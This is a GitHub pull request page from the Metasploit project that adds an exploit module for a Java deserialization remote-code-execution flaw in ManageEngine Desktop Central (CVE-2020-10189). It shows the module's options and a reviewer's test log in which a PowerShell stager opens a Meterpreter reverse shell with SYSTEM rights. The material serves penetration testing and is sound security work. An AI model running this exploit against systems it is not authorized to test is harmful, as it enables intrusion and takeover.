Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ManageEngine Desktop Central exploit (CVE-2020-10189) #13071

Merged
merged 11 commits into from Mar 13, 2020

Conversation

@wvu-r7
Copy link
Member

wvu-r7 commented Mar 12, 2020

https://twitter.com/steventseeley/status/1235635108498948096

msf5 exploit(windows/http/desktopcentral_deserialization) > info

       Name: ManageEngine Desktop Central Java Deserialization
     Module: exploit/windows/http/desktopcentral_deserialization
   Platform: Windows
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-03-05

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 service-resource-loss

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Windows Command
  1   Windows Dropper
  2   PowerShell Stager

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8383             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a Java deserialization vulnerability in the
  getChartImage() method from the FileStorage class within
  ManageEngine Desktop Central versions < 10.0.474. Tested against
  10.0.465 x64. "The short-term fix for the arbitrary file upload
  vulnerability was released in build 10.0.474 on January 20, 2020. In
  continuation of that, the complete fix for the remote code execution
  vulnerability is now available in build 10.0.479."

References:
  https://cvedetails.com/cve/CVE-2020-10189/
  https://srcincite.io/advisories/src-2020-0011/
  https://srcincite.io/pocs/src-2020-0011.py.txt
  https://twitter.com/steventseeley/status/1235635108498948096
  https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html

PatchedVersion:
  100474

msf5 exploit(windows/http/desktopcentral_deserialization) >
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch 3 times, most recently from 2f3d1b1 to 2cf0df8 Mar 12, 2020
@wvu-r7 wvu-r7 removed the needs-docs label Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from c8cacaa to dd98fa7 Mar 12, 2020
@wvu-r7 wvu-r7 marked this pull request as ready for review Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch 2 times, most recently from 93683e7 to dd98fa7 Mar 12, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from dd98fa7 to ed5dd4d Mar 12, 2020
wvu-r7 added 2 commits Mar 12, 2020
Hat tip @sranjit-r7.
@space-r7 space-r7 added the docs label Mar 13, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Mar 13, 2020
wvu-r7 added 2 commits Mar 13, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/manageengine branch from 1b8cda3 to c11be38 Mar 13, 2020
@smcintyre-r7

This comment has been minimized.

Copy link
Member

smcintyre-r7 commented Mar 13, 2020

Tested all three targets successfully. Thanks for adding the additional CmdStager target and registering TARGETURI, those will both give users alot more flexibility.

msf5 exploit(windows/http/desktopcentral_deserialization) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. 100465 is an exploitable version
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Uploading serialized payload
[+] Successfully uploaded serialized payload
[*] Deserializing payload
[+] Successfully deserialized payload
[*] Sending stage (206403 bytes) to 192.168.159.133
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.133:50416) at 2020-03-13 14:38:23 -0400
[!] This exploit may require manual cleanup of '..\webapps\DesktopCentral\_chart\logger.zip' on the target

meterpreter > g
[+] Deleted ..\webapps\DesktopCentral\_chart\logger.zip
etuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 

Will land this momentarily. Nice job!

@smcintyre-r7 smcintyre-r7 merged commit 2a5c433 into rapid7:master Mar 13, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@smcintyre-r7

This comment has been minimized.

Copy link
Member

smcintyre-r7 commented Mar 13, 2020

Release Notes

This adds an RCE module for the ManageEngine Desktop Central Java Deserialization vulnerability identified as CVE-2020-10189.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/manageengine branch Mar 13, 2020
@tdoan-r7 tdoan-r7 added the rn-modules label Apr 1, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

6 participants
You can’t perform that action at this time.